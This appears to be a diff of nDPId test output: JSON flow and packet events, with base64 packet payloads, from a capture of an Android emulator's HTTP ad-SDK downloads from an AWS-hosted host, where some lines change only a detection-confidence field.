-01173{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2316,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184944,"flow_last_seen":1654385184965,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3353,"flow_avg_l4_payload_len":1117,"midstream":1,"thread_ts_msec":1654385184965,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +01173{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2316,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184944,"flow_last_seen":1654385184965,"flow_idle_time":7580000,"flow_min_l4_payload_len":497,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3353,"flow_avg_l4_payload_len":1117,"midstream":1,"thread_ts_msec":1654385184965,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36640,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/endcard-dsp-1302-f2714a34f6661a70fedea1667fb7a9e4.zip?md5filename=f2714a34f6661a70fedea1667fb7a9e4&foldername=endcard-dsp-1302&mof=1&mof_uid=91199&n_imp=1&mof_pkg=com.sceneway.kankan&n_region=fk&alecfc=1&bait_click=1&mof_textmod=1&bp_test=2&wglbp=1&cta_type=1&mof_use_get=1&dlst=0&mof_use_get=1&plmug=1","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 06309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1654385184968,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":4350,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":4350,"pkt_l4_len":4316,"thread_ts_msec":1654385184968,"pkt":"nLbQ0+MztKXvZygQCABFABDwKKwAAPgGTNcSQGcewKgCfgBQjy5+eHC\/0XpgIYAYAINNZwAAAQEICvuAHVKcUadRtia3OWrUCi577oZVo7qVa1pV4DAWp5BUj1ylZg9HIVDCN9HY7AbTeijAg4XsrglqbYq5vDpykI6WdQmyzYmgrKIxhalIqTk9ryxzUznXMoouNDMlCihWCVviO0KxmTPE5KQ9+7SsAUrQi7Sg+qF5Pd0DtbjZtLz871N0tzex+ukapoFCrA7xXAT7EhUt7xIHEz3L0UmSEhywkGvPteUIxdc6E6toBq3MvO55kaYOGDx48p6ZBs0l28a6bJ4zQJDaeXlGC3OM6mMEiebMI1OGu5tfpXMjhz6Rp73wrdy57Payp01EHIjlCdRLUKOAPfFUuHBSZHV78nHM8xiG0tJng+sW\/lS+Ct4omI2wK1pbPk0VNnnDxoaUD4P9h2HGucJMMsOcLUiwYhj1kheWaGnaKjtJU86IE8hv7kMCVo\/B1CxxE3Lz+jqf+jgF8eENd4d4\/zg\/OJd9i\/VoLDYszM0GnwgrV6X6zCwUU8MUmHILsn1nKkxsK+j59rAslcf4WjgzPH\/bxH1Xf\/hRSG9h1GHU7F7dhqqMXd4GsfiUbI5KewunZSYn3sSrjPhasqzcbZWIOn\/RZGzSCzJrYTqkQVw\/T63VN\/xpgAg02on1ddwj7ZXVGqEZ14pCRJ4U1Nlz4GosQC2e4WkU56BxFokH+fTqlofOKVzfTTBLskJj5p\/BXxTGrZxWaisoBhtbb8NE8Bmwrx8kTZqCTZ4LizErphxTdyPZU8mP1LWCkBnHJ5AFAviY9cnU+ZbIwX1VuD6Djzu3WeCSXVqRfHW4ggvwWzYs\/gP9Jpl67985\/6\/54LGh3CGiAgEgcG6BGxY8R11bg8qYxj2WScXzuo0eu4ZJ1uM5xG3D3x7O7xmZSyQYoEmBJEeWqjVCrbHbJCcpoCpd1s+S3OYYriGysUdQFw3VpBOPd6d6s8rlqWwPuY+gRHRJgJSn+ZHDQFEafniozT+8SkWOQ5rQAe58UhC9CEqwUYXDjACh3vzGpLHKqglIUwlGKGW6YhUdUMwTnxVEN5X0kmoRJNoqHFhBmEY9BmP5+OU4QSH4xOI5zReHcNmGyhmg2dxP4TJYS\/MmkwxJ2PiI+KkAnqHY0xoTbdbyJKU6xxIlj31MxZNGm1P2mPnjEKvm91XbL88c0sI4gC4jtuPQowmsExa7xIVAWeJWpuywE2myad4k0pzsE5rlIj7\/quzGMwjIayYKok+aeditOgqCCIp7Kd3WWcNlzfIetdoBRmGhdKoVdXlxx6Ril9ggFuDcF856+Nzit0M9yvQyF4OmsA18wbuJCw69M9A30ml2L9fxmr1URKoZGMaExc02oNMIn4wHMUyukvZCYS9CJIMDWwrH2TSFMXvF1ikdepy0FG3vigcAcfOcvNka76wATRzD21xzyO4PK8NKUOWFMi9TYaaMjCeHjnWWJnIhuZfBFIVojlQlpoqbIHE5pMbLvRzrT+\/c+c9U3rDurSLvr05vZU3uuVvgIe07OZJ+6XCDm7ZM6e3AlXgcTZ7lB9Y2alCJr5832MZIIhz9vgnMVtPVR2xymBxqPeVZcUSF88ascPkun62PxmORsMrVddGtvmxECSlwKnz9ikb3r0H2wPbe3tafZ3F7cyBgLihy\/EZ\/5d7W1Joqcq+fgtXBF1qvp8fBtVe5A94Nn0XIHvFgn9MyRia6LxN\/jz9f\/HIPpXDHZ1GXH3N4vL3dd7OrtjcqksxUL3umHNivH\/h1fxXCr3B4fDteDwdZ8BZnR4BtwnVuvEm9fy8RDPZa+2xs6JNNIuYS8y9dWRuyjwc5HpIv1W4V7IHAPifgrbB31tyn2B4Tnow5XvNljMP43jsFONvtKdn0qlfMMIaz5GBmfmEIHi2aEF9c7kXvOf6c6i6Ho4r9L3d+4HGZDTbnuLyWbo3+d8pttm9FB\/vaZov5fj2DX192EQ9XsUgvfsKv3Ja8btDZJooZ10aOkx3Ed3hDWXaZbCq2lh9\/te54Syd34psOYJ5LmEwk3nTe4i3az2bTd4l+2aciRXCt22yvpFWFZmG4dqfUWGuh4d0d8vPGCM\/dw+n8C87fnoIDEau5tajR9lwluJLmT3qANwvwj9UA3CUuFhmuDC38WaUyB22P\/AW7pvquAYgVEcHm+38V8HiTF3TfQF8s4EEt\/nGyY22fP36vJaubKd\/Lsx5MdGyNzrJ4tliXSZuYpui5llx2rs0EepLJCRRIwShmOq8VTWoI7lFOcQdeigF7zyzJICt17FH7xsjRTNluvXNudWS8ckDt\/GCH9zCQHpYtg3FxdezTyW7TMJZYCrG30qqTTL+t4RxzpdY8Arx37bBCDZe+6M5fh8N5jmXukeeGZzYwEDR5LxLrYqeUrBd47Bcqg0Rs\/Nq\/rMSoXyvOWMXnE\/\/eA935FTy7WUl0XdagriM+8I8Uv9Zo8RSV8Ocrvf\/MuDeqHGNfdU9p999Yzx8wHts\/QjqrfiJBQUsKlURNQLYr+Pxph7vufBZ\/Fc5vbqMe6771nH+m7vl9rr0T7\/xRTBfIGGq5HXOdIsI72zo2UPXWY35vDp9ew0lf79IEc1BLyrpqu3PDc2vVEKbEvH2uDM\/5dotey+W3GoQgBt0gWlq1Ffbd0gncyJNkVhqr1BY0YCFX1p9Xt3n+lan7AYgIqRmRtW9l3rnzF0V5pCQfvHdgxXB0xAFfQ9wbnflmyWCAMX8Pit8n0B5iuplKZkVr\/KxKGyHieTJBN5FwzpT90P5djs1bFf0Rf5wxaz1asqwsHzD\/c5+F8LEBzgoPqPAUFIo1eWFKlRhO\/tbO0jPdX3mmk9v3XX+VlE7JjYbO0n4+TynxNb8a1NdLGruQGXq7oZGQBHzhz+I5lK2ng7Gn\/2+DyNJCCYfY9jv\/0f\/z6tnL6iOnCn3mqeG331Q6DtB\/rA\/SNqCtJYdWoge5Li+sAb2lVxB44by6fVRKjvN\/ed46pLkbyNsZjFTHXUOvF79Zmw7uPaf9c\/S3tr3ZetMjrlt\/xLflJbwBB1d6dGEjIG73t66uRtteXbuh5Wp2avHtn+nTVLsCXOSP8DYJa1+0xyJBIuyZygqzrU7nlfLe\/OzCF\/5Jru3JFrUqJ4lEHon\/2ra2fij+fb0Bl59y\/cnJdz0eb2+\/5fNYKtsGJz0wA+9r1f3x\/Xq96U5\/OB7fbl9vu\/sYjEpvs\/cPTr+t3+13XubW9ggXOahqx9tLS7q18deRBAtJhfvoo2y++aqeQD8R9KCF\/Dkiogsvv3klwo1s+T0ed\/+BFzb4qaX720zjbz+dx\/1wVv\/dSeZ\/O50Ptot9xN72sxeoeq0hP71AartzeTr1Uk8s8jX3pn3F5+3y9\/yb09Kjv7czFjwkR+nzjYfe7\/PdPDtShK8T6irCbJPw5MvzUVfJ5p4VsOEFuL2hJvpVhB5gptcWjO4f06+RL+xPxJoZe8c+f7z7khRCp5pn3mmgvHaZjWaZ0bfBQpSDRs3EnlfWIRIQ8pc4XuqHIMcZqiHcEOI\/xI9FPpfiOwRWf2DPy+D\/FHyp7KzBwzkQkdc5P0SwR0iT0x4nkVQetvDUn8aCBUbz09Pz67gcxcbm7b8uF39wTMBPHU+Ifi7P\/+hNKzSs3hcvw20bZ2FIuXH0avcL7oPC6lPKZSDcWr76jNpjNpYk8uYX+V28Ub+2rpglw3yHdxQxookD2isPoPuwD1jlewb2D6IctFdSIm+w\/Zf3xRxA6STk0UetBkkHLPZxVta55o7Zn73t00Cbpj\/th\/SK\/CY24Cj3M6F31c2E8hqIh\/lRaF3ld\/HVs3oQAwvz1NJVuk\/47Q\/0uMU+EwuwBopxSRIThXyjyXvoLpCZCh9cSBf3B2bo4ie0W7L\/GXVboE0OWenVZ+0PWurXvHK3+JX4wQCFwW55uXEloNP76fZCjAEr3CX4t7QaUA8GiLYxNBtH9UyqRTzuk91VlQ+YKR7WdqbUDlRusWV2IE4A3fsvTwckEmfbwuLqlwQqNCKaOfadCiMP5oP8B3JK6S8pGgBiG824Drhb2UOwvRo\/cGOIvAmSIuv4l02e1Zu7H2junWlVhR9o7oUreho5AkoQcNXeyj1zdMfhE\/qXLzN0aN1FUP4D\/RfkWJmQ4W+03nLiuqY+CDASxVNYX5eT+ctUzMJUH3tadi+YC8tIJmIlJp+OXhoGafcrEpHI7ldn9zuzZMetfuZcR07PEwoDQIptcPnDkCNMuWQ3CyHK9gM3R55O871qh1ISHtaMlHeVEvh5iCSEay9mGUM76LtJ8eB6we\/rIv0ife6hqx+ylA32SahXgsnDK64t\/kePph3Cpr2dXfjPaiJUAV13WxqT9PXQl307hp6+PciT\/RRalj7JGBJaKFxGUHOzbAKVzhmpAO2F1\/LjKkR36fJQTcFfxgNmgfiOmN+RfH7Yk76MvFabxD+2DuZLszyDjHHz1jrEG3qIbLRYwTpBT1ArOzvhebj4aKNnk1yYj3OLq2+VvDDPvaz5qCX2XE31vAtgSM4axL6C8crzfJ1GrhONX8E3aEt9LAqDfJNA5gCT\/nO6vaCMZUjttP31Fyg3rZ9badwXFpPhKFYfC\/WY1a+O\/+wBVEEz7Lk2t7x7Pq\/\/\/bW7t9\/vb3havf7t73h28HAbf\/\/n+Wl\/aJBBqfjB8vtKk0my+d\/+U1FOrn5P\/l9bq+\/X3K73G77Pk4NvMyoCFw\/\/xJB+OHwRe7\/s\/mix\/Xn93h\/tz8Pe5mfznd\/7x3O9+x356do2919ifP7876+sY+PHsvSLy\/n9a\/Tg8M\/Nuve+vJs2VrafwAqz0tudm60ws6Wl1QUXRXNCIBdjmGALJSEYb8MIIKVssOU2rYHxl1q\/Uc2MP1L9ckqLPk7nfNz\/ouOdgnQBtijNss1Ttm276pRt\/mXbtm3brlO2bdu27b63Jya6Z6I7IndkPqx82ZFrZebL1\/nESAKa8JdDiUY7SRKUv\/TEscD0eEmHfWnKsIC\/0pgDfqOehe3YocrFxcQUoNPl8ygCarTVURKtYe6Ufin5mjYNYN+U78DExOx1pt+Ut50PuSUIwem9tv6ysTrcd3Bpd+i62fotcXoS8KWKFdhCqKV\/P5T\/OiGpAvTW4r8W9HLFxlxzT0eiXngHhWOgJBrrhSEVZBSsaOd0Nc+UflCOS0RbV\/EYtp8W0zZKboYpUMc1GKXyePUpdjcllZCyFvHT\/9HqTJLUyyWDFnqWS0D8nJh5Y92IkMpZAVjhC9virUc3XS++Ddch0jMAS6rmEaxrSsvDUyy4AQsc7ZcCrKweap3zbN9S+tYy5ACkTim9ROHF2JRORwNYmIO4r3\/i0tXqapZ9J8SXZhI1NjuoUvUIiRdwJyV82CRoxKcIQkgW9s2o+Wzf4zha6sqlbdSZIUxnwP8x4zwbnSdR3rYj5s28EmcqpaXZmKd1fHYPicaQZA4wq7B\/8Bx0D\/i3RSKfjVRtWaM5OnFeo81rmnU6dTrVPVoB+3VX73mKiYh8B7i8JKvDNFfUsCKttEBpaZCxhNSE6pp6KLD70pU3pbqImpzPRHFILNbBJ\/u2PR4c7a2\/+jSfiQEc9VLWrcOTOg0o2FMfv0ZP6xAieGjq5Gvd2UINUm8bCqvZ+nW8TGy+nsya74sKOlBcAFavG1rdnqcc+EZrCIqCnT+Zu5Nrew28GwzbAN8Yk3fNZ1REgcAgnJsXnJvlYU8xcIWjidFkI+sFoS8uUPdhyCEveLesPuTOSqhVQd8nj5tPCaLePVWssKd9p\/AsV+nAJ4mMLEl8GAab"} 06293{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1654385184969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":4350,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":4350,"pkt_l4_len":4316,"thread_ts_msec":1654385184969,"pkt":"nLbQ0+MztKXvZygQCABFABDwKK8AAPgGTNQSQGcewKgCfgBQjy5+eIF70XpgIYAYAINNZwAAAQEICvuAHVOcUadR+OEAbsaEV4ATs1KWNFGTmcPU4ah2dE6ss+8j7HasEYjyQ8ziHPOiHkIxj1A5a3PYkXlKr5mNKYD3r6jOwEB8EUYHESkmKncUQQjfuQcyaXe6+v3CpZhAGHSefk\/hCi3lXmAh8Zlr3l9WPQDHGS3ZzfLWAeS0\/eIMH5Q\/xCkJ2\/FKzVL5CEJFUMHrR9+nBartpqxP05ypzIuWYoty\/EKPzESUaLPvsACxjxpuq1\/EShw3xehTGP4lzW9ELxZo4ob8rmKWH5xy81PCe2ClfOroISutHqD40zQvj0hnRmWBK0W0myUEZVRV4IMAalDU53Qm4o0CJHBr8WfegeEqTB7qyZYAoNfSwv1EgIVkqmb349jAhaCVk7q7PFuOOZzkel9fx8Ix80FwYCi+Ikda2bl9y\/BPQMvOPaYpe0RMRQZoe+Gt2My+l5MoRv7hgdlLBXsuD2suT600hhgez9ouAPy6W2l3cGiugYJeL6TOvCuCaPEnNWXGkedl\/U\/+5nmRhjgGR4vHBT97b7fNYLG2+jWxOXIGyJ3T6nn7cy33on9p6RW3okfOgPcUrQ7uOs32YIxNW7s5UJ3X4LPxNrPJyBYoVPzIKK7qXFwGMIUDsETi0zXDALFxESgJ+vfd\/Qpqg8UeIWn0vCvQfDTaBiz2G5bFILF\/31VLz+f7kf3t8eOqHaL2HH\/BLl\/IlUB4UQsB0puS0Vm9N2Zj3qlvfNtr73ZJJ9GNfy6DqkemWGY66QWKyO8Q6xN13zxzNWEnm2ACzLoRMy4bM+fpP15m2LeG+DdezfkHUfDWFmQq5Bh5jJsKf5Z0zeuHh8TOfgElYumVfTCjzNsHNsZKBxRXnKaxChci4RywELTlmtnkxdieWYG6QFq+dAetgwUvzY6oazaVirbGGuEdq3txTwnbL3PS2+bi89k\/xZnllSwTG5aoSJ1ffVF5TQfV5i6PFHR4IrYu2tk+ax2FTAKrZBj\/DOU+CdLbxNKqj\/fPafmSaHDhg2H3k0OlcAkBoPd+FnYCns52k6+r2jXP4cnifWEX1biQB4+plOKZgd+oGchPX+MARL3eCzTayIP57BtnyaXEa5frcmwoeTxuy\/vdpJUO7lTEqGNEJgSangDUvgdtN+hREdf86wXhUYvrwXjaT07Pqx9dG+F\/wPN1o37+4ZP8r4lVBbspJZovHg\/4zTvf7g9f01m2bn6n0zOTqB+ve1y2Xb6L3D0dAy2tBwif9sdDGanumq+Koa\/lw34VcWK4eK\/q\/O1dvNwIavzop\/C781sdEmRuohjSCqPyalurO\/jlrNhM6pzLJdDE3QT+bsW4\/y6RyXPwuRMhYWfH3JPNsM4TQsxotY8tYPxza8tX0+1LiZntZNvB3CsNJTa5QJVUhwwS24pMRHpfSP9VqeVkbVwl52V414SI9r4U719W\/7hQA5xwPps\/4XdLR68iiNZaRj3wt02axL9TcJG296k0BxfZJe0HRGKjOcbVuQFgA13l7YrvP\/5uHbYRO3pSY4m4ZTW5M7YbF+OXzgaJhfGAOSvKbFICZhAMu6Tv9ULfJZnxyUnTlEy2Ejld8Fdve4qXCh5AacIxapgw1fzRLUvKLKI7EQ5tlJ9VTZqvnaV1yE8ORUeDjmyDE1lKia8bdRJ8teb5Xuh5fEJodTAd1kEiKZQk+qdBLxsXhVNnc21\/CldJSVD3FxKqRlhnys91y8riM0a3xkOOTNsYlHxDA8u0Rirfmd7Zqwa2om77b0FldUFXrq0\/btgCQtDK8Pv4uXd8Ui7Rsvr0h50bzhu90QmZ40ZxHIrt\/ecFfnXIcJZbQFrq7lUN9uXHkpkx0I8mcGsDRHN9S2mZ8qJIKCD4RQ29lRYx5yCVILHczNtAYQhE\/o2A09TGUmkAsWLqpyS3oaZEDBVHXmsu3iQ5cu0swcPeYxyAczTsWfOQBc2a5KlPPw93TmcxVuBqmBM2Hl2qi3XnRcr+Zvdr7h6dTASazwnchFdbU7BHqKkddBscp1K0W0wGZzrg9c8som0myjCFpPBelNTXZ0ZrdIftsO2AK+4Qhkztt8Vgq7aajy2AiP8Rtb4nrB9sp3F\/\/qhNoMivutuGtpAUf+7xAvJKtvf1F+j\/jvGB\/n8BPRY2Zv8\/jg9MuffyEtD\/wztC+d9l\/xvzSPa\/zKOQ3SVicA7Njin0LiEkvgDMu7IbMCHkVl0P+jjTSV6\/fJcCHLFdyMHWM5kF60QZoLU3hVh\/oHx\/HApnJUYt4yaPJaMrhdTPZdP2bduOUcv5pZfLDrZYjS5Fhv8Sj1YZ1ZneruygiHriTf3CnQtpWu+9\/p4isgXE\/nfNxFDk1JEPincuqm5rqzVyMsjZWC9SLyjO3d1kTPQTmkvDevqLJv\/pRzSEaPRuzI51uILUZD6zoTGazXVqtZ8UJXiCGCqy9UicczZRM+mPlLcH8n9vFdL\/3gNHEzcDR+P\/2bH\/pcZUHjKFBwUC+m\/h\/x\/U1nZmdnSG1gZGVvT2tmYRCnLi8DDY\/90OLykhqvSfWe8\/hfFfshKQdYNzIxAQyJKkqJCKxGhzoq6EssGf0bz6TKQLVgFySzlZh1AKl2MpO2rZEIX+BbJAF6IUJDJnRcyQkKk5WOVyqA8FqYIvSqX4C3Ki8qEB0wts5cUmxInpuOlSo9Muu1uu23uj5ABuP\/XfU4\/fz5zGNNCZ\/mrmU+JvmaxFm7Udv+B6qPgdUzEILH\/t6s43whh\/w\/LwsCxn9hFhE5Wp7M0nJAhCHCyT\/FSSP4Vkr21T\/lgzsmdCkk+gW+bEKk46gOIj\/tESSJTvSSs1jov2e9LyG+gkdkeV2RGRMKtH7eXL5gt4qILb8T0yK3LgEkgtZEuGRkLMjj1mLbbuKM8nFrEXMLqL0WcElHVJ2FnaiO187TT8b\/eQ1CcKA7CCU0n+Hcf2LZ6nrpwzdJkNVmY8eX33F5WE0d7xHSq4T4L4vGm9+fh0fVG7ELzGVscdsV7\/fAGxJxH+nndwXuyHk22k6pkmuWugv9NFwdispfFkMEECvMJncKKJbZvhHUuGh8TLXt4Dk+MKa4z0CdEHEOb5WbtE2F8ItYlPIBPnEwdpkZt7EHgQfI130YCGbTGjGOWG78S7lGeXu2hbjZTMMxoJT5jpsRmWq6RY7YKI3Nmw0n1o+etAf182TuX9t7oefO6zEaxG6aVWISs7RqIh1It7I\/e2u1sEw0Z1fDwZcSMjFWpVhBkoraCeYefwUwmSj9adXNL5YqRItbLbUGpPLulhNfN3bbtAlHt31TSjYN5GeBfh8+QU5jgeQY7BsvbjDwPK\/JjZzaJ2fj1ECMxvfq55zEGoHtjrQj2ssHXheJbFF9A9HMI9P+gso\/48eTLceXnriYJt3DVqNN497hURpCNMX5f5S7kpA2\/xT1i3k9dwgNw5uCMo24YhTsvZgyPi49FKAgcfRbEWxbx2nOrig3H73Bgd8eqbmBf2XYcDRFmte4tr9yDpAindBtB3X+o0CDPUxTpQN5UU1kzj9dXcRInA5obGxbZP3Mt\/z7mkmJxorbB+4P83emjHFIt2QYCA8v9jJLz\/m5HMHA08\/uujS7g7p9PjxANDff295yd7aJAFB0HakX440ss1u1GQCi9gfqJauEHsatZtYpjiLqnAr0CsPxnpmhrra1yc7W0e7u9v4GAhYkNDZKQlxSbGx0foaCnJqirLS2xNTS7Oz0\/wcDHRsjLTU3S0NdbW11d4uDnZujrbW3y83V0+3qgNpZLMjIwVXh2coe64u9xsjW+pAYLab\/yhm4ggH2DkGTIOUA+O1HvWt9fHAo33v34\/c7JUMiMdI5mn\/Gb0Nd62beRT1f03xwYjk+sIHhQDpJ1\/drt3h7xWPWY9dt+yrggyP7p\/szt3VvzcKn8WTUbBYVLlWyvu\/+14U3qOdFSwAZTZXHf0l\/R7+1tsfc7RMuqAyXAStf2kBco3nI\/UT0pxrA4xmgQMmXfpRgysHi7VTkpre3cAIMQ71V5tggJPI\/IFc0fwrvWIBJ1qFkusj7\/olDZrbFziBwemeXU400GIUmcbLbp6G707t+KJeQKzyT4zZWmOenRcBD77Y387R2GnKPASWFLfXTy7heYfatWj8nC4NB3oatJ9r3NUTDk7h0KkYasGVE9yvHx4yuQHLiVHG2lw4ux2EwdOrdxeJluyP2N7DPO4t\/m5wdfpdv08NT\/jXDCnODpKm2yyz8fwvs9yOuv\/zmgThOWj36hVvXb6frExTX2npcmftjD8GhJ8+nrltRA2V75Nf2R+PiKmfyXtfj5uhW7K76hvO8u4JVc\/RwlUunXnhvxWHzevY7Cju8JOM+ihQnNvtVUSkpEICbwM3VOfHLLDrjdTvN9Pez3reKp22\/2yTzPArufdZc4uctv90eSd3W\/c32jBWG91CWOHle9ycDglB23ZtZLG6N71CnB6db3xn+4I1Zk+b8X+\/Km1bGtp73kL+SggYBk05gHIdo\/ZtUmO289vTdod0r1K0NbsfVbwNkpW2+WJfHW7paLM38NOZcGrlJD+PH6byFhU22pOfNhwUwp5dny0VztJmYP8z7v7fznjSxOnMYYcGIhUARgI5\/\/oDANjC1szejML06tvI29yg7VW6BHXhXqbTdeF82IeydEWGxw3680Wm\/+Mrc3ZTgLXnfWM9d2bmagcnwuj5boLbbzVe4HZx8rExISjk\/kyyBLIbkjgCBzCoxNbRhF6YJAAwt+oIDCoOsp7bTEZUcnAlAQs3CcBuW6hvkB\/Qf+539Hn3zY8MFzK7Z73aV565flhH6Zl4KUiiD8ZZlkp6tq6zpvzs5yat22qu+7bQF5O18XnDkZ\/YfFGqt2dTKVzjKtYLdVodMlreT1drbaPsFhM5XD4Sq25XW21u9Gs2G31eHxMbfn9fX+AbwgDiLYI9\/cLFGmRmfrn71nrJR2gK0jH6y00g7GQv\/TBQ\/TXS9sTAsVSwMm4TagSVUPYKk16sbNStFQ3eYqdmr08xT7gqcOCmadGRgYTa0rNNCiuMTDOT7PVVinTdFtaItz4IhEWkr5e5OvZv+Rr\/9kJ39zMExTl3gtK76BkthHJKc+ER3bX58+hwFbVf+7v2eM+MCmCfAaB2stSK2UEQAwFHAZPtJYpgX8ByZxbYbgZRwr5MTzbpOiGAWnyqy16UBgtHVbL6K0+Pd4BJBrbC62z9GL\/nDyux553bUidfT\/iTpBNiNs9l5ynYNNJqF8qqF24gOmO0+amrzRwlSRPi0jJ+0hPIVA8indNwFXk4DP4k2uwBW\/v+Oe80kFedV7\/5SDOvd1B6xQpAQvYBerEXA8av2MK4wDTK8shMjlHk7vsTQiTJs3OhNNCwU0jkXGp2t7xYN+7NKFFBAqFR1aeiJ3DFPacWwkevE+W6OOz45lC4PUf2zWFnQJ35O6\/OeG+nLZULOQtED9Nusw50hebtv7bBnp87nstCikrQfkG8fbFnnUIK8Oiew8WlEQc6sOKsC0GYnaEAb2FTgn+KsQDkBQSYyuAeB7cepmExety3IYmUU9dcjuclZ2Ooxyn3o7pGuKajq3MO76Jy8ekCwci3BoEE4PRTv\/jmfQEizO8\/1ly83ecos5SlFpyIHB4TKMcjYyJphR+yGodKQnSIjQ96fJ3Om9aWiSCmwVM47wNE8KQ7DCdnLOw4GpA0zbv3cT+LUdxXQb9G34MPlmVZprER6YI4lWZjZeqb16bSgJDqZROMoKDSkB68uqFhy6gaR+fkk5Fho9KKlm+1Z5j"} -00973{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184944,"flow_last_seen":1654385184969,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":8865,"flow_avg_l4_payload_len":2955,"midstream":1,"thread_ts_msec":1654385184969,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2019\/1113\/mini-260291c208bf3376b5111db855e89451.zip?md5filename=260291c208bf3376b5111db855e89451&foldername=mini","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +00973{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2325,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1654385184944,"flow_last_seen":1654385184969,"flow_idle_time":7580000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":8865,"flow_avg_l4_payload_len":2955,"midstream":1,"thread_ts_msec":1654385184969,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36654,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2019\/1113\/mini-260291c208bf3376b5111db855e89451.zip?md5filename=260291c208bf3376b5111db855e89451&foldername=mini","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184982,"flow_last_seen":1654385184982,"flow_idle_time":7580000,"flow_min_l4_payload_len":262,"flow_max_l4_payload_len":262,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":262,"midstream":1,"thread_ts_msec":1654385184982,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00822{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1654385184982,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":328,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":328,"pkt_l4_len":294,"thread_ts_msec":1654385184982,"pkt":"tKXvZygQnLbQ0+MzCABFAAE6JG9AAEAG2MrAqAJ+EkBnHo80AFAYADoNP4BZp4AYAfY9sQAAAQEICpxRp3YAJw3ER0VUIC9ydi9lbmR2NC5odG1sP21vZj0xJmVjX2lkPTQmbW9mX3VpZD05MTE5OSZuX2ltcD0xJnVuaXRfaWQ9ODg4MSZzZGtfdmVyc2lvbj1tYWxfOC43LjQgSFRUUC8xLjENClVzZXItQWdlbnQ6IERhbHZpay8yLjEuMCAoTGludXg7IFU7IEFuZHJvaWQgMTE7IHNka19ncGhvbmVfeDg2IEJ1aWxkL1JTUjEuMjAxMDEzLjAwMSkNCkhvc3Q6IGh5YmlyZC5yYXlqdW1wLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ